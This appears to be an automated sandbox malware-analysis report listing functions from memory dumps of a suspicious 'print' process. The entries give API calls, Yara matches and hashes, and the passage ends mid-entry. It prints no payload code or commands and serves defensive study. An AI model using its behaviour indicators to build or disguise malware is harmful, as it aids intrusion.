                                  • Instruction ID: 0871efc07ce2b033aef9fdbc594b8c66fdaf44110e71d8f639ff775bee52563f
                                  • Opcode Fuzzy Hash: 3f5689d5568528678ff2772a83c4ae4a8c3050025cba5acf404892c604bd037a
                                  • Instruction Fuzzy Hash: EC90023164550802D540B1584555707100687D0301FA5D451A48A456CD87A58A51A5A2
                                  Function 02E739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1d5e292adb557a9f72241fabd9eb4df563a1e2ea72c4c7591c474f86376dcd12
                                  • Instruction ID: 03cfbda01c75e5fbaecf77b3cc98e514a81f73d9f6509f034d262dda170a3660
                                  • Opcode Fuzzy Hash: 1d5e292adb557a9f72241fabd9eb4df563a1e2ea72c4c7591c474f86376dcd12
                                  • Instruction Fuzzy Hash: 3790023128545502D590B15C44456174006A7E0301F95D061A4C94598D85658955A221
                                  Function 004B1870 Relevance: .4, Instructions: 399COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: e038637b64fd7fe978c5397ce8ec1635554fa7228557eb9eacc14ec4479ba474
                                  • Instruction ID: e607a43eab769f6d2fb08bc52550c89d24865d61d2b7433ea6eae84e0596c60d
                                  • Opcode Fuzzy Hash: e038637b64fd7fe978c5397ce8ec1635554fa7228557eb9eacc14ec4479ba474
                                  • Instruction Fuzzy Hash: C7E1C3B5900208ABDB24DFA5CC91FEF77B8AF44304F54815FE509A6241E778AB44CBB9
                                  Function 004B0744 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 004B07FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: #$y14291878$y14291878
                                  • API String ID: 1836367815-3963701365
                                  • Opcode ID: 192abf325b3ea21824b377f06d93f79007e6aae840d08c78804be79fbfe80f49
                                  • Instruction ID: c51a10784244c5991d5aeec606698c113069ec7ae89de7b482a900956b390073
                                  • Opcode Fuzzy Hash: 192abf325b3ea21824b377f06d93f79007e6aae840d08c78804be79fbfe80f49
                                  • Instruction Fuzzy Hash: 9D115CB6D0821876EB20A9A15C42FEFB76C9B41751F14406AF500FB242DA78A9034BF9
                                  Function 004B0778 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 004B07FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: 5e8196c960923dd45be43cdba9af6da37779855a69d1a5b22b4ea6941ef301e3
                                  • Instruction ID: 7b2c7aea0c096980cabe1bea29030cd1b9c2c0ea7952973939216ce2abd32ecf
                                  • Opcode Fuzzy Hash: 5e8196c960923dd45be43cdba9af6da37779855a69d1a5b22b4ea6941ef301e3
                                  • Instruction Fuzzy Hash: 3A112B75D4031C76EB21AB928C02FDFBB7C8F45B54F15805AFA047B281D6786A068BF9
                                  Function 004B0780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 004B07FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: 1caf40d980aa9fb1f68732b398c9d702392ef72b49a24ab96c18859571f864a8
                                  • Instruction ID: 4c8dc570f0398edfd8e0dbe75f4f76650e0c4d38e780e892924c35aa67f75ed4
                                  • Opcode Fuzzy Hash: 1caf40d980aa9fb1f68732b398c9d702392ef72b49a24ab96c18859571f864a8
                                  • Instruction Fuzzy Hash: 27019B75D4031C76EB11A6928C02FDF7B7C9F45B54F14805AFA047B281D6785A068BF9
                                  Function 004C221E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 105sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004C234B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 9edccf1f84105b80908487fe7ef6a8665fed385207208b02fd0a59c6b8d29bec
                                  • Instruction ID: b4dc1ea492ed963d23a0bfd79edc8d3586037776653f981fcc2199c10e9450f6
                                  • Opcode Fuzzy Hash: 9edccf1f84105b80908487fe7ef6a8665fed385207208b02fd0a59c6b8d29bec
                                  • Instruction Fuzzy Hash: 093144B5640705ABC714DF75D881FAABBB8BF84304F10C16FE9494B246D7B8A941CB98
                                  Function 004C2290 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004C234B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 1a7fc33de45ecd14281b2a99dff2042c2476312378d1dfd0dcb3a07c3e5af08c
                                  • Instruction ID: 958ac651e400757a7d0ffd286cdc147a48c3ac02a3f79ca2435bf894c09da2ed
                                  • Opcode Fuzzy Hash: 1a7fc33de45ecd14281b2a99dff2042c2476312378d1dfd0dcb3a07c3e5af08c
                                  • Instruction Fuzzy Hash: FA31A0B9600704ABC314DFB5DC81FA7B7B8AB88704F00852EE9595B245D7B8A9458BA4
                                  Function 004C2281 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004C234B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: ec5168f086ebaccb2d6c210d625b24ec537f46d9780a6ead5633f213c5100785
                                  • Instruction ID: 8fc2dd85610ec4c81e0013410472624fdfdc760997a6587fca94214af21191bd
                                  • Opcode Fuzzy Hash: ec5168f086ebaccb2d6c210d625b24ec537f46d9780a6ead5633f213c5100785
                                  • Instruction Fuzzy Hash: 323134B8600701ABD314DFB5DC86FA7BBB8FF44304F10856EE9495B242D3B8A901CB98
                                  Function 004B89B1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?), ref: 004B8AB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID: @
                                  • API String ID: 3188754299-2766056989
                                  • Opcode ID: 84994f8e6e76c4317007dac4bd0581fd0bc53c74b269bd43de313a015885e149
                                  • Instruction ID: a7ff89f89cae5b447d415dff4b4f561acb67b18cbd6a1cf64a389f2caed9c02b
                                  • Opcode Fuzzy Hash: 84994f8e6e76c4317007dac4bd0581fd0bc53c74b269bd43de313a015885e149
                                  • Instruction Fuzzy Hash: 8F7180B6900208ABDB24EB65CCC5FEBB3BCBF54304F04459EB51997141EB78AB84CB65
                                  Function 004C52EB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 004C532F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: O.K
                                  • API String ID: 3298025750-1854833371
                                  • Opcode ID: 4b5aa64f5ba4c3c612b9a5cd7c0330bcd3d668e977d563ee96dec5fbc15f857a
                                  • Instruction ID: 71921602681f446505e544c89e0960fdc4e9559ae7af4e4d7be4abe756b82167
                                  • Opcode Fuzzy Hash: 4b5aa64f5ba4c3c612b9a5cd7c0330bcd3d668e977d563ee96dec5fbc15f857a
                                  • Instruction Fuzzy Hash: 56E0A9766402047BD614DE68DC45FEB3BACEFC9304F00441DF919A7246C630B91287B4
                                  Function 004C52F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 004C532F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: O.K
                                  • API String ID: 3298025750-1854833371
                                  • Opcode ID: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction ID: 5acd8fd2f31cbae66c8582bb874996a42d44f06ad90c48d3a33471eefa9ed942
                                  • Opcode Fuzzy Hash: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction Fuzzy Hash: 52E06D756003097BD614EE59DC41FEB37ACEF89714F004419F908A7245CA30B91287B8
                                  Function 004BE33B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004BE357
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 92b3656de57ae04be54b36e53e04bb6ec684fd44637c409875d14d218ac1d68b
                                  • Instruction ID: c53a5bc3eb8738747412fac498ea0c650fd957e97ebf82f043f06f03e3a3bb2d
                                  • Opcode Fuzzy Hash: 92b3656de57ae04be54b36e53e04bb6ec684fd44637c409875d14d218ac1d68b
                                  • Instruction Fuzzy Hash: 11313CB5A0020A9FDB00DFD9D880DEFB7B9FF88304B108559E516AB214D775EE058BA4
                                  Function 004BE340 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004BE357
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 42644eb9cb8a97c7a2562cfbd1a9ec628bef68d335092513e298bc299c2a7cd0
                                  • Instruction ID: cdcb24d924fb52eca670523cca819651da710bc616e40db27bc19ae720c2878f
                                  • Opcode Fuzzy Hash: 42644eb9cb8a97c7a2562cfbd1a9ec628bef68d335092513e298bc299c2a7cd0
                                  • Instruction Fuzzy Hash: AF314FB5A0020A9FDB00DFD9C8809EFB7B9FF88304B108559E505AB204D775EE058BA4
                                  Function 004C5291 Relevance: 3.1, APIs: 2, Instructions: 51memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(004B1DB6,?,004C368D,004B1DB6,004C3387,004C368D,?,004B1DB6,004C3387,00001000,?,?,004C6AB0), ref: 004C52DC
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F0,?,?,?,?,00000000), ref: 004C532F
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateFree
                                  • String ID:
                                  • API String ID: 2488874121-0
                                  • Opcode ID: cc79cb5720d16c866006725d92432473df268cde86e9717ad7832cb281e242da
                                  • Instruction ID: 524133fa7a2e91e050cf4cee1d867e1b1ec6775a08d8ec237242df602ef074bf
                                  • Opcode Fuzzy Hash: cc79cb5720d16c866006725d92432473df268cde86e9717ad7832cb281e242da
                                  • Instruction Fuzzy Hash: 52018F75600304ABDA14EE59EC45EEF37ACEFC8314F00841DFD1897201D631B82086B8
                                  Function 004C5376 Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(004B0C30,004B0C58,004B0A30,00000000,004B7403,00000010,004B0C58,?,?,00000044,004B0C58,00000010,004B7403,00000000,004B0A30,004B0C58), ref: 004C53DF
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: be8fd82fbb9b57d5ed4d0eb12e4f3fac554820af14e744186c5af2f15f39826a
                                  • Instruction ID: bce22b37ff480ccf8fd684e4ba652ebaf839ede6901950263c4c295f08f9dcc8
                                  • Opcode Fuzzy Hash: be8fd82fbb9b57d5ed4d0eb12e4f3fac554820af14e744186c5af2f15f39826a
                                  • Instruction Fuzzy Hash: 4501D0B2200209BBCB54DE89DC81EEB37ADAF8C754F50810DFA1897251C630EC528BA4
                                  Function 004B3F60 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004B3FD2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction ID: 055184f6919f2667a063b7b8d0a67837edc1719825f0e79d77f133f735461327
                                  • Opcode Fuzzy Hash: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction Fuzzy Hash: BC011EB9E0020DABDF10DAA5DC42FEEB7789B54308F00419AF90897241F635EB188BA5
                                  Function 004C5380 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(004B0C30,004B0C58,004B0A30,00000000,004B7403,00000010,004B0C58,?,?,00000044,004B0C58,00000010,004B7403,00000000,004B0A30,004B0C58), ref: 004C53DF
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: df6cb25baf8e528ad07d615df7d097839871c99748219ac17daafc1e2249a330
                                  • Instruction ID: 916dd60f8da0b6e277148462ab4ad65cf8f224003778e4c0d958df8e3e790ba2
                                  • Opcode Fuzzy Hash: df6cb25baf8e528ad07d615df7d097839871c99748219ac17daafc1e2249a330
                                  • Instruction Fuzzy Hash: 9601D2B2200208BBCB54DE89DC81EEB77ADAF8C714F518109BA0CE3245D630FC518BA4
                                  Function 004B7247 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,004B188A,004B1FF9,004C3387,00000000), ref: 004B7281
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 44ce567384fe842da9dc7ce04356af8bda112395332fccdb5fd454a01764cf7d
                                  • Instruction ID: e738bb85bc6e4e53793b4664f2379133326e98fb9d80cf27159d6e4c2208137e
                                  • Opcode Fuzzy Hash: 44ce567384fe842da9dc7ce04356af8bda112395332fccdb5fd454a01764cf7d
                                  • Instruction Fuzzy Hash: C601A2B9A002056BEB50A7E5DC46F6A37A89B48309F01458AF9089B342D579E9408B6D
                                  Function 004A9860 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A98A2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 1c5dec91a4bfc04bf35926f0779c9329ac47ed7f2b7136fd89576935e0307051
                                  • Instruction ID: 4e5002ea02b988f67f820a1051df6f4a2d9b9af0209f8c773a9015b7076a5b04
                                  • Opcode Fuzzy Hash: 1c5dec91a4bfc04bf35926f0779c9329ac47ed7f2b7136fd89576935e0307051
                                  • Instruction Fuzzy Hash: 14F065773807043AE22065AE9C02F97779CDB85BA5F15042EF74DDB5C1D89AF80146E8
                                  Function 004A985A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A98A2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: c7e59920372728439286e3b1ee68b7fc45f5854e7f8d27ffe96bf63a858e39e6
                                  • Instruction ID: 9607a4358b7028ebe5bf37019acbfe773587daad7181e64a6c3ae194ede22645
                                  • Opcode Fuzzy Hash: c7e59920372728439286e3b1ee68b7fc45f5854e7f8d27ffe96bf63a858e39e6
                                  • Instruction Fuzzy Hash: A1E092766807043AE230759E8C03F977A9C8F95B95F15041EF749EB2C1E9AAF80147E8
                                  Function 004C52A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(004B1DB6,?,004C368D,004B1DB6,004C3387,004C368D,?,004B1DB6,004C3387,00001000,?,?,004C6AB0), ref: 004C52DC
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction ID: 43b6299d06c8b83dd374762331559cfdabef8d16a1b87a97d190d1d559d2848b
                                  • Opcode Fuzzy Hash: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction Fuzzy Hash: 29E06576200308BBD614EE99DC45FEB77ACEFC9714F004419F908A7242CA30B8108BB8
                                  Function 004B7440 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?), ref: 004B746A
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 8d2906bbc91a53e1c87f5abb34116fd128d0205bad16ffdb7b6214b9d03fa410
                                  • Instruction ID: 657b6b7db37ee7a1e7f290865754dfa1ecde843115e08585fdbf85862fb61830
                                  • Opcode Fuzzy Hash: 8d2906bbc91a53e1c87f5abb34116fd128d0205bad16ffdb7b6214b9d03fa410
                                  • Instruction Fuzzy Hash: 10E0DFB12402042BEA2066AC9C42FA7334C8B8C724F084651F85C8B2D3D138F8014568
                                  Function 004B7250 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,004B188A,004B1FF9,004C3387,00000000), ref: 004B7281
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: fb7a33cec1d39ce195ad21a52201164bf4f421547d8ea323c53712181d85e884
                                  • Instruction ID: 3327df917a3e8ed1975498c447d951e2e8ad192b055eccb589f68294c3cc27d6
                                  • Opcode Fuzzy Hash: fb7a33cec1d39ce195ad21a52201164bf4f421547d8ea323c53712181d85e884
                                  • Instruction Fuzzy Hash: 8DD05EB5A403043BF650A6EA9C03F5A368C8B88759F058059F908D73C3D86DF5004A69
                                  Function 02E72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                  • Instruction ID: 7d1ed4588080eb7725c4eca6e90640f20d5bb3284c9a405960a42779ec48885f
                                  • Opcode Fuzzy Hash: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                  • Instruction Fuzzy Hash: 27B09B719415C5C5DE51F7604A09717790567D0705F55D061D7470645E4738C1D1F175

                                  Non-executed Functions

                                  Function 00BB0531 Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1331a14fed96d572056bc11e8ed8391b251be653cf7280d6f7089aec77952925
                                  • Instruction ID: ea1a2265ce2fba0c80448801cf1beedfeef6ea6c341a22022af8d79b0df8fdcb
                                  • Opcode Fuzzy Hash: 1331a14fed96d572056bc11e8ed8391b251be653cf7280d6f7089aec77952925
                                  • Instruction Fuzzy Hash: 0E41B370918B0D4FC368BF6890816BBB7E2FB95300F50466DD98AC3652EBB4E8468785
                                  Function 004AE137 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c45f0aec0e30f5df99ca7ee0fbb2e4de7da89b2681fe00c62bb627950933d554
                                  • Instruction ID: d1b918f45314246111cfdd45cb8b0eb261df171fb81fa6ed77f5a8b8e04e81c3
                                  • Opcode Fuzzy Hash: c45f0aec0e30f5df99ca7ee0fbb2e4de7da89b2681fe00c62bb627950933d554
                                  • Instruction Fuzzy Hash: 98B04826E6501542DA2469AA7841AB4E3A483E72A1F4822A7A808A3280A94BC869408A
                                  Function 00BB978B Relevance: 57.7, Strings: 46, Instructions: 214COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496036532.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_bb0000_print.jbxd
                                  Similarity
                                  • API ID:
